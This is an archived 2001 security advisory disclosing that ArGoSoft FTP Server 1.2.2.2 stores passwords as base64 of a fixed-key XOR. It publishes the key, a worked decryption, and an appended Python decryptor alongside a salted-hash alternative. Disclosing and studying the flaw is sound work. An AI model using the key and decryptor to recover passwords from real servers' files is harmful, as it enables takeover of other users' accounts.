ArGoSoft FTP Server 1.2.2.2 Weak password encryption

AFFECTED SYSTEMS
ArGoSoft FTP Server 1.2.2.2

DESCRIPTION
ArGoSoft FTP Server 1.2.2.2 for win32 is vulnerable to decryption of the password file. The programmers are evidently aware of this, since the FTP Server program itself implements the decryption routine: the decrypted passwords can be found in the program's memory dumps, or by using a system debugger or special tools to peek at the password field in User Properties, which is masked with **** (normally one would expect this field to hold something like "-=encrypted=-" so that the password can only be changed, but here it holds the plaintext password).

This simple observation shows that the password file uses a weak, reversible password encryption algorithm and that the passwords can be recovered from the ciphertext. So I started studying the program and found the following decryption algorithm. Take the ciphertext password: NkouCREIJVU=

1) Look up each ciphertext character in the table 'A'-'Z', 'a'-'z', '0'-'9', '+', '/' and take its index, ranging from 0 to 63 (each index represents 6 bits). Four such characters make up three binary bytes (4*6 bits = 3*8 bits); this is ordinary base64 decoding.

2) XOR the resulting binary data with "T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk=" (XOR the first decoded byte with "T", the second with "3", and so on).

After these two passes we get: NkouCREIJVU= -> byterage

I've attached source code that decrypts ciphertext passwords: you can give a ciphertext as the first parameter to the executable, or you can give it the filename of an ArGoSoft FTP password file, and it prints the passwords of all users.

IMPACT
Combined with the *.lnk upload bug I pointed out earlier, any user with write access can not only traverse directories but also obtain the passwords of all users.
VENDOR STATUS
I have sent my findings to supportat_private, but since they use the decryption algorithm within the FTP Server program themselves, they are already aware that the password encryption is reversible. Hopefully they will review the encryption algorithm in a next release.

====================================================
[ByteRage] byterageat_private [www.byterage.cjb.net]
====================================================
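As an added example (not the author's attached source), the two-pass scheme described above in Python, with a salted one-way hash beside it to show what a password file should store instead; the handling of passwords longer than the 72-byte key and the PBKDF2 parameters are my assumptions, not anything the advisory states.

```python
import base64
import hashlib
import hmac
import os

# Fixed XOR key quoted in the advisory. It is baked into the server binary,
# so the "encryption" contains no secret: anyone with the password file and
# the program can invert it.
XOR_KEY = b"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk="


def decrypt_password(ciphertext: str) -> str:
    """Reverse the stored form: base64-decode, then XOR byte i with XOR_KEY[i].
    Assumption (not stated on the page): stored passwords never exceed the
    72-byte key, so the key is not cycled."""
    raw = base64.b64decode(ciphertext)
    if len(raw) > len(XOR_KEY):
        raise ValueError("longer than the fixed key; behaviour not described")
    return bytes(c ^ k for c, k in zip(raw, XOR_KEY)).decode("latin-1")


def encrypt_password(plaintext: str) -> str:
    """Forward direction: the same XOR, then base64. XOR is its own inverse,
    which is exactly why the stored value reveals the password."""
    raw = plaintext.encode("latin-1")
    if len(raw) > len(XOR_KEY):
        raise ValueError("longer than the fixed key; behaviour not described")
    return base64.b64encode(bytes(p ^ k for p, k in zip(raw, XOR_KEY))).decode("ascii")


def hash_password(plaintext: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """What a password file should hold instead: a salted, iterated one-way
    hash (PBKDF2-HMAC-SHA256). It can be checked but not inverted."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", plaintext.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(plaintext: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _algo, iters, salt_hex, _dk_hex = stored.split("$")
    recomputed = hash_password(plaintext, bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(recomputed, stored)


if __name__ == "__main__":
    # Sample ciphertext from the advisory; the page states it decodes to "byterage".
    print(decrypt_password("NkouCREIJVU="))
    print(encrypt_password("byterage"))
    print(verify_password("byterage", hash_password("byterage")))
```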
This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 21:29:18 PDT